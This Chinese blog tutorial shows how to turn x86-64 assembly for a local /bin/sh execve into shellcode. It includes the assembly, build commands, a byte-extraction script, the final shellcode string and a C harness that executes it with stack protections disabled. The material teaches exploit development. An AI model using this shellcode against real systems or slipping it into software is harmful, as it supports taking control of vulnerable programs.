您的位置:首页 > 运维架构 > Shell

转换汇编到shellcode的过程

2017-09-28 16:04 232 查看
汇编代码如下:

section .text
global _start
_start:
jmp shell
here:
xor rax,rax
pop rdi
xor rsi,rsi
xor rdx,rdx
add rax,59
syscall
shell:
call here
bash db "/bin//sh"


编译执行过程如下:

jay@ubuntu:~/Desktop/bin2shell$ vim shell.asm
jay@ubuntu:~/Desktop/bin2shell$ nasm -f elf64 shell.asm -o shell.o
jay@ubuntu:~/Desktop/bin2shell$ ld shell.o -o shell
jay@ubuntu:~/Desktop/bin2shell$ ./shell
$ ls
README.md  bin2shell.sh  shell  shell.asm  shell.o
$ exit


用如下bin2shell.sh 脚本将二进制的shell程序 转为x86_64位的shellcode

#!/bin/bash
for i in $(objdump -d $1 |grep "^ " |cut -f2); do echo -n '\x'$i; done;echo


原理:objdump -d后取带数字的每行的第二个字段 并在其前加入 “\x“ 之后echo输出

jay@ubuntu:~/Desktop/bin2shell$ objdump -d shell

shell:     file format elf64-x86-64

Disassembly of section .text:

0000000000400080 <_start>:
400080:   eb 10                   jmp    400092 <shell>

0000000000400082 <here>:
400082:   48 31 c0                xor    %rax,%rax
400085:   5f                      pop    %rdi
400086:   48 31 f6                xor    %rsi,%rsi
400089:   48 31 d2                xor    %rdx,%rdx
40008c:   48 83 c0 3b             add    $0x3b,%rax
400090:   0f 05                   syscall

0000000000400092 <shell>:
400092:   e8 eb ff ff ff          callq  400082 <here>

0000000000400097 <bash>:
400097:   2f                      (bad)
400098:   62                      (bad)
400099:   69                      .byte 0x69
40009a:   6e                      outsb  %ds:(%rsi),(%dx)
40009b:   2f                      (bad)
40009c:   2f                      (bad)
40009d:   73 68                   jae    400107 <bash+0x70>


最后效果如下:

jay@ubuntu:~/Desktop/bin2shell$ ./bin2shell.sh  shell
\xeb\x10\x48\x31\xc0\x5f\x48\x31\xf6\x48\x31\xd2\x48\x83\xc0\x3b\x0f\x05\xe8\xeb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x2f\x73\x68


最后利用shellcode的c代码如下:

# gcc -fno-stack-protector -z execstack shell-testing.c -o shell-testing

#include<stdio.h>
#include<string.h>

unsigned char code[] = "\xeb\x10\x48\x31\xc0\x5f\x48\x31\xf6\x48\x31\xd2\x48\x83\xc0\x3b\x0f\x05\xe8\xeb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x2f\x73\x68";

main()
{

printf("Shellcode Length:  %d\n", (int)strlen(code));

int (*ret)() = (int(*)())code;//声明一个函数指针  将code数组的地址转换同一类型的指针并赋值

ret();

}


代码:https://github.com/tangsilian/SomeCode/tree/master/bin2shellcode

参考:

https://www.exploit-db.com/exploits/42791/

cut 命令解释:https://www.ibm.com/support/knowledgecenter/zh/ssw_aix_72/com.ibm.aix.cmds1/cut.htm
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: 
相关文章推荐
新的分享
章节导航